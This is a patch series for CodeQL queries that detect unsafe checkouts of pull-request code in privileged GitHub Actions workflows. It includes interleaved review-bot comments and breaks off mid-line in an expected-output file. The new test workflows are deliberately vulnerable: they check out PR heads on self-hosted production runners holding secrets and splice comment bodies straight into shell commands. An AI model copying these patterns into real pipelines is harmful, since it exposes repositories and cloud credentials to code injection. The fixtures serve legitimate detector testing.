--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,4 @@ +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 269c1de902b0028873fbb813a90150fc06b9956d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:22:18 +0200 Subject: [PATCH 521/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ec2e82dfe010..b4c388cf6152 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.49 +version: 0.1.50 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f493e1d64b..e5709a523298 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.49 +version: 0.1.50 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53f82d3d6c54a49dbba84e3e47782c6a7a2d54f5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:29:35 +0200 Subject: [PATCH 522/707] Control Checks in Run/Uses steps also protect Jobs that depend on them --- .../codeql/actions/security/ControlChecks.qll | 14 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 30 +- .../CWE-829/.github/workflows/test14.yml | 227 +++++++++++++++ .../CWE-829/.github/workflows/test15.yml | 271 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 37 +++ 6 files changed, 571 insertions(+), 16 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 26bee3ca3a68..1a47f4d92d02 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -59,7 +59,15 @@ abstract class ControlCheck extends AstNode { step.getEnclosingJob().getANeededJob().getEnvironment() = this ) or - this.(Step).getAFollowingStep() = step + ( + this instanceof Run or + this instanceof UsesStep + ) and + ( + this.(Step).getAFollowingStep() = step + or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + ) } abstract predicate protectsCategoryAndEvent(string category, string event); @@ -188,9 +196,7 @@ class AssociationIfCheck extends AssociationCheck instanceof If { ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", - ]) and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and - normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") + ]) } } 
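Review bot: The new disjunct `step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step)` assumes a dependent job only runs when the needed job succeeded, which is the default but not guaranteed: a dependent job with `if: always()`, `if: failure()` or `if: ${{ !cancelled() }}` runs even when the check step exited non-zero, and a check step with `continue-on-error: true` never fails its job, so in those cases a Run/Uses check does not actually gate `step`. Unless that is filtered elsewhere in the enclosing predicate (which starts outside the hunk), consider excluding such dependent jobs, or at least documenting the assumption above the disjunct, e.g. `// a check step in a needed job only gates this job when the job keeps the default success() condition`. The pre-existing `getEnvironment()` branch a few lines up carries the same caveat.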
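Review bot: Dropping the `MEMBER`/`OWNER` requirement makes any `if` that merely mentions `author_association` count as an `AssociationIfCheck`, including exclusion lists such as `!= 'NONE' && != 'FIRST_TIME_CONTRIBUTOR'` (the shape used by the test14/test15 fixtures in this commit) that still admit `CONTRIBUTOR`, i.e. anyone with a previously merged PR, so checkouts behind such conditions will now be treated as protected. If the relaxation is deliberate to reduce noise, that precision trade-off belongs in the class's doc comment, e.g. `// Any condition on author_association is accepted, even one that still admits CONTRIBUTOR; tighten with a MEMBER/OWNER/COLLABORATOR match if false negatives matter more than noise.`; otherwise keep a positive match on at least one privileged value.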
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 499abc047b65..9efd9b036cd1 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -29,8 +29,14 @@ where
 (
 // issue_comment: check for date comparison checks and actor/access control checks
 exists(Event event |
- event.getName() = "issue_comment" and
 event = checkout.getEnclosingJob().getATriggerEvent() and
+ (
+ event.getName() = "issue_comment"
+ or
+ event.getName() = "workflow_call" and
+ checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() =
+ "issue_comment"
+ ) and
 not exists(ControlCheck check, CommentVsHeadDateCheck date_check |
 (
 check instanceof ActorCheck or
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index 8577218800e1..ce138fb04786 100644
--- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
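Review bot: The `workflow_call` branch added here is the same seven lines introduced in UntrustedCheckoutHigh.ql in this commit; a small helper predicate in the library (taking the event and the checkout step) would keep the two queries from drifting apart. Separately, the control checks looked up via `check.dominates(checkout)` (just past the hunk) are, as far as visible, resolved inside the reusable workflow itself, so an actor/association condition that the caller places on the job with the `uses:` would not be found and the reusable workflow's checkout would still be reported; a comment next to the `getACaller()` line stating whether caller-side checks are intentionally ignored, e.g. `// checks performed in the calling workflow are not considered here`, would make that explicit. The enclosing `where` clause continues outside the hunk.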
@@ -26,23 +26,31 @@ where
 inPrivilegedContext(checkout) and
 (
 // issue_comment: check for date comparison checks and actor/access control checks
- exists(Event e |
- e.getName() = "issue_comment" and
- checkout.getEnclosingJob().getATriggerEvent() = e and
- not exists(ControlCheck write_check, CommentVsHeadDateCheck data_check |
- (write_check instanceof ActorCheck or write_check instanceof AssociationCheck) and
- write_check.dominates(checkout) and
- data_check.dominates(checkout)
+ exists(Event event |
+ event = checkout.getEnclosingJob().getATriggerEvent() and
+ (
+ event.getName() = "issue_comment"
+ or
+ event.getName() = "workflow_call" and
+ checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() =
+ "issue_comment"
+ ) and
+ not exists(ControlCheck check, CommentVsHeadDateCheck date_check |
+ (
+ check instanceof ActorCheck or
+ check instanceof AssociationCheck or
+ check instanceof PermissionCheck
+ ) and
+ check.dominates(checkout) and
+ date_check.dominates(checkout)
 )
 )
 or
 // not issue_comment triggered workflows
 exists(Event event |
 not event.getName() = "issue_comment" and
- not exists(ControlCheck check |
- check
- .protects(checkout, checkout.getEnclosingJob().getATriggerEvent(), "untrusted-checkout")
- )
+ event = checkout.getEnclosingJob().getATriggerEvent() and
+ not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout"))
 )
 )
 select checkout, "Potential execution of untrusted code on a privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml
new file mode 100644
index 000000000000..6f03a0e966a1
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test14.yml
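Review bot: The comment `// not issue_comment triggered workflows` on the second disjunct is no longer accurate for reusable workflows: a `workflow_call` event is not named `issue_comment`, so a reusable workflow whose caller is issue_comment-triggered satisfies the first disjunct's new event test and also enters the second one, where `check.protects(checkout, event, "untrusted-checkout")` is evaluated against the `workflow_call` event. Because the `where` is a disjunction, the alert fires whenever either branch finds the checks missing, which looks intended but is not obvious from the code; suggest `// every other trigger, including workflow_call — a reusable workflow called from an issue_comment workflow must satisfy both this branch and the one above`. Binding `event` to `getATriggerEvent()` before the `protects` call is a good fix of the previously unconstrained `event` variable.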
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml 
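Review bot: test14.yml carries a real-world deployment workflow almost verbatim — production secret names, a Slack channel id, Azure credentials and deploy scripts — of which only the `security-checks` job, its `needs:` edge and the `Checkout PR branch` step exercise the ControlChecks change, and the same applies to test15.yml; at this size it is hard to tell which step is expected to be reported or suppressed. Consider a header comment such as `# Regression test: the author_association condition and the 'Check for conflicting pushes' step in security-checks should protect the PR-head checkout in the dependent deploy job` and trimming the Slack/Azure/deploy steps the query does not look at. Note also that the fixture interpolates `${{ github.actor }}` and `${{ steps.email.outputs.email }}` directly into `run:` lines, which other queries in this pack may flag and could make the expected output noisier than this commit intends.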
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
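Review bot: In the `security-checks` job's `if:` expression the author-association guard reads `github.event.pull_request.author_association`, but the trigger is `issue_comment`, whose payload exposes the association as `github.event.comment.author_association` (and `github.event.issue.author_association`), so the four `!= 'FIRST_TIMER'`-style comparisons test a missing value and never exclude anyone. If this fixture is meant to model an ineffective gate, a comment such as `# NOTE: pull_request.* is not populated on issue_comment; this guard is vacuous` would make that intent visible to whoever maintains the expected output; otherwise the field should be `github.event.comment.author_association`. The `Check comment keywords` step is also fragile: `` if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` `` appears to work only because bash returns the status of the last command substitution when no command name remains, and both arguments carry a literal `echo ` prefix; the intended form is `if list_subset "$full_allowlist" "$COMMENT_BODY"; then`. Since this file is the new CWE-829 test input for the `.expected` change later in this commit, a short header comment naming the steps that are the intended findings would help keep fixture and expected output in sync.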
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d9cbfe804ae8..4fbfca241261 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -188,6 +188,43 @@ edges | .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | | .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | | .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | 
.github/workflows/test14.yml:198:7:206:4 | Uses Step | +| .github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run 
